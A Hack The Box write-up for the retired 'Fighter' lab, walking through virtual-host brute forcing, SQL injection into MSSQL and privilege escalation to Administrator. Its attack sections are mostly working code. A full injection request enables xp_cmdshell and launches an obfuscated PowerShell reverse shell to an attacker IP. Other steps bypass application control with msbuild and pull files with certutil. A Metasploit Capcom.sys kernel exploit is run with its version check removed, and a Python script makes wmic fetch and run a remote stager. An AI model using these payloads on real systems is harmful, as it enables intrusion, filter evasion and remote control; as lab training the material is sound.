htb-fighter-nl

Today we are going to solve another CTF challenge, “Fighter”. It is a retired vulnerable lab from Hack The Box, a platform that lets pentesters practise online penetration testing at their own experience level; it offers a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: since these labs are available online, they have static IPs. The IP of Fighter is 10.10.10.72.

Let’s start off with our basic nmap command to find out the open ports and services.

C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time
Nmap scan report for streetfighterclub.htb (10.10.10.72)
Host is up (0.029s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: StreetFighter Club
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds

The Nmap output shows only one open port, 80 (HTTP), served by Microsoft IIS 8.5; everything else is filtered, so the web application is our only way in. (Nmap also flags the TRACE method as enabled, which is worth noting but is not needed here.)

We find that port 80 is running http, so we open the IP in our browser.

On the homepage we find the domain name “streetfighterclub.htb”, so we add it to our /etc/hosts file.

The page itself gives us nothing new, but since the site is served by name, the same IP may host other virtual hosts that give us more clues. We intercept a request in Burp, send it to Intruder and mark the subdomain part of the Host header as the position to brute force.

We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.

After the brute force, one name stands out: “members.streetfighterclub.htb” returns HTTP 403 where the other names return the default site.
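As an added example (not part of the original writeup): the same Host-header brute force as a stand-alone Python script using only the standard library. It assumes the IP and domain from the scan above; the candidate list is a short constructed stand-in for namelist.txt. A name is reported when the server answers it differently from a baseline request for a name that certainly has no site, which is exactly the kind of difference the 403 on members.streetfighterclub.htb produced.

```python
import http.client
from collections import namedtuple

Response = namedtuple("Response", "status length")

# Constructed candidate list for this example; the real run used
# /usr/share/dnsrecon/namelist.txt, which is far longer.
CANDIDATES = ["www", "members", "mail", "dev", "admin"]


def fetch(ip, host, path="/", port=80, timeout=5):
    """GET `path` from `ip` while presenting `host` in the Host header.

    The IP never changes; only the Host header does, which is what makes
    IIS select a different site binding (or refuse with 403) per name.
    """
    conn = http.client.HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": host, "User-Agent": "Mozilla/5.0"})
        resp = conn.getresponse()
        return Response(resp.status, len(resp.read()))
    finally:
        conn.close()


def is_interesting(candidate, baseline, min_delta=50):
    """A name is worth a look when the server treats it differently from a
    name it has no site for: a different status code, or a body whose size
    differs by more than `min_delta` bytes (small jitter is ignored)."""
    if candidate.status != baseline.status:
        return True
    return abs(candidate.length - baseline.length) > min_delta


def enumerate_vhosts(ip, domain, labels, fetch_fn=fetch):
    """Return [(host, status, length)] for every label whose response differs
    from the baseline. `fetch_fn` is injectable so the logic can be tested offline."""
    baseline = fetch_fn(ip, "this-name-should-not-exist." + domain)
    hits = []
    for label in labels:
        host = f"{label}.{domain}"
        r = fetch_fn(ip, host)
        if is_interesting(r, baseline):
            hits.append((host, r.status, r.length))
    return hits


if __name__ == "__main__":
    # Live run against the lab IP; requires VPN connectivity to 10.10.10.72.
    for host, status, length in enumerate_vhosts("10.10.10.72", "streetfighterclub.htb", CANDIDATES):
        print(f"{status} {length:>7} {host}")
```

No DNS or /etc/hosts entry is needed for the brute force itself: every request goes to the IP and only the Host header changes. The hosts entry is needed afterwards, so that the browser and dirb send the right Host header when we target the name.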

We add the subdomain in /etc/hosts so that we can access the web site.

We open the page in the browser and get a 403 Forbidden error.

We now run a dirb scan against members.streetfighterclub.htb and find a directory called “old”.

dirb http://members.streetfighterclub.htb/

Next we look for pages inside that directory. Since the server is IIS, we brute force for “.asp” files and find a page called “login.asp”.

dirb http://members.streetfighterclub.htb/old -X .asp

We open it and find a login form.

Enumerating the login form, we find it is vulnerable to SQL injection. Through it we retrieve usernames, passwords and e-mail addresses, but none of them lets us log in. Since the backend is MSSQL, which accepts stacked queries, we move on to command execution through the injection: enable xp_cmdshell via sp_configure and use it to launch a PowerShell reverse shell. We referred to this link for the technique. The request we send is below; the injection sits in the logintype parameter, its output is written into a scratch table because the page itself displays nothing, and the mixed case in xp_cmdshell and in the PowerShell command is there to dodge simple keyword filters. Note also the cookies: the application stores the submitted username and password base64-encoded on the client (YWRtaW4= is “admin”).

POST /old/verify.asp HTTP/1.1
Host: members.streetfighterclub.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://members.streetfighterclub.htb/old/Login.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Connection: close
Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D
Upgrade-Insecure-Requests: 1

username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login

 

We set up our listener and get a reverse shell as the SQL Server service account.

C:\Users\jacco>nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440
whoami
fighter\sqlserv

We do not find anything useful with this shell, so we try to upgrade it to Meterpreter, but any .exe we drop refuses to run. This is not a firewall (a firewall filters network traffic; it does not stop a local binary from starting) but an application control policy on the host. The usual way around such a policy is to let a trusted, Microsoft-signed binary do the work: msbuild.exe compiles and runs C# embedded in a project file, so nothing we supply has to be an executable. We got a reference through this link on how to bypass this. We use nps_payload to create an XML project file that contains our payload (download from here).

We move into “c:\users\sqlserv”, since our shell runs as sqlserv and that directory is writable for us.

We run the command that nps_payload prints to start our listener.

msfconsole -r msbuild_nps.rc

We start our python HTTP Server to send our file to the target machine.

python -m SimpleHTTPServer 80

We download the file on the target with certutil.exe (the attacker IP differs between our sessions, so adjust it to your own).

certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml

We then run the uploaded XML project file with msbuild.exe.

As soon as it runs we get a Meterpreter session. Running sysinfo shows a 32-bit Meterpreter on a 64-bit machine, because we launched the 32-bit msbuild.exe (the one under C:\Windows\Microsoft.NET\Framework rather than Framework64).

To get a 64-bit session, we list the processes, pick a 64-bit one and migrate into it:

meterpreter > ps
meterpreter > migrate 2320

We still don’t find anything to escalate our privileges with. Since the box is themed around Street Fighter, we google for Street Fighter exploits and find that Street Fighter V shipped a kernel driver, Capcom.sys, with a privilege escalation vulnerability (it lets an unprivileged user run arbitrary code in the kernel). The driver registers a service called Capcom, so we check whether it is present on the target:

sc query capcom

We find a Metasploit module for it here, but running it fails with an error stating that the system is not vulnerable: the module’s check rejects the target’s Windows version. We edit the module and comment out the section that checks the OS version.

Now we are successfully able to run the exploit.

msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec)> run

When we check our identity with getuid we find that the exploit has given us administrative rights.

We look through the user directories for the flags; in “c:\users\decoder\Desktop” we find a file called “user.txt”, which contains our first flag.

We move into c:\users\Administrator\Desktop and find a file called “root.exe”. Running it prompts for a password. Next to it sits a DLL called “checkdll.dll”, which presumably performs the password check.

We download both the files into our system using meterpreter.

download root.exe /root/Desktop
download checkdll.dll /root/Desktop

We reverse engineer both with IDA and find that the check XORs each character of a stored string with 9 and compares the result with our input. IDA names that string aFmFeholH; the bytes it holds are “Fm`fEhOl}h” (the backtick after “Fm” is easy to overlook, and the “l” is a lowercase L, not a 1).

So we write a small C program that XORs 9 with each character of “Fm`fEhOl}h”.

We compile and run it and get the password “OdioLaFeta”.
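An added example, not the author’s C program: the same XOR decode in Python, plus the brute force one would run had the key not been visible in the disassembly. The encoded bytes are the ones read from checkdll.dll above and the key 9 comes from the disassembly; the scoring heuristic is an assumption of this example.

```python
# Obfuscated password bytes as stored in checkdll.dll. The backtick at
# offset 2 is a real byte (0x60); a copy that drops it decodes to garbage.
ENCODED = b"Fm`fEhOl}h"
KEY = 9  # single-byte XOR key recovered from the disassembly


def xor_decode(data: bytes, key: int) -> str:
    """Apply a single-byte XOR key to every byte; this is the whole scheme."""
    return bytes(b ^ key for b in data).decode("latin-1")


def rank_single_byte_keys(data: bytes, top: int = 5):
    """If the key were unknown, brute force it: there are only 256 keys.
    Each result is scored crudely by how much it looks like a typed password
    (all printable ASCII, many letters, some vowels). Returns (key, text)
    pairs, best score first; ties are broken by the lower key."""
    ranked = []
    for key in range(256):
        out = bytes(b ^ key for b in data)
        if not all(0x20 <= c < 0x7F for c in out):
            continue  # non-printable output cannot be a typed password
        text = out.decode("ascii")
        letters = sum(ch.isalpha() for ch in text)
        vowels = sum(ch in "aeiouAEIOU" for ch in text)
        ranked.append((letters + vowels, key, text))
    ranked.sort(key=lambda t: (-t[0], t[1]))
    return [(key, text) for _, key, text in ranked[:top]]


if __name__ == "__main__":
    print("known key 9 ->", xor_decode(ENCODED, KEY))
    for key, text in rank_single_byte_keys(ENCODED):
        print(f"key 0x{key:02x} -> {text}")
```

The scoring cannot separate key 9 from key 0x29: a key that differs only in bit 0x20 flips the case of every letter, so “oDIOlAfETA” scores exactly like “OdioLaFeta”. With an unknown key you would try both top candidates against root.exe; only one is accepted.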

When we provide the password to the root.exe we get our final flag.

Alternative route: with the help of Empire

To bypass Defender we use the starfighter_xsl stager for Empire by Luis Vacas. For this we write a small Python script that makes the target fetch and run our .xsl, which gives us an Empire agent:

root@kali:~/htb/fighter# python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py
import requests

# Stacked MSSQL injection through the logintype parameter: enable xp_cmdshell, run one
# command and switch xp_cmdshell off again. The command makes wmic fetch our .xsl from the
# attacker's web server and run the script embedded in it, which starts the Empire stager.
# The odd casing (xP_cmDshEll) is deliberate: it sidesteps simple keyword filters.
params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"}

resp = requests.post("http://members.streetfighterclub.htb/old/verify.asp", data=params, allow_redirects=False, cookies={"ASPSESSIONIDCARRRDBA":"IFMBKKKDLPNKELDDENPKDKNB"})
print(resp.status_code)

Let’s hand the Empire agent over to Metasploit with nps_payload (https://github.com/trustedsec/nps_payload), as we did before: from the agent, change to the sqlserv profile directory, upload the generated project file and launch it with msbuild.exe:

cd C:\Users\sqlserv
upload /tmp/msbuild_nps.xml msbuild_nps.xml
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml


Author:Puckiestyle

reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/

 
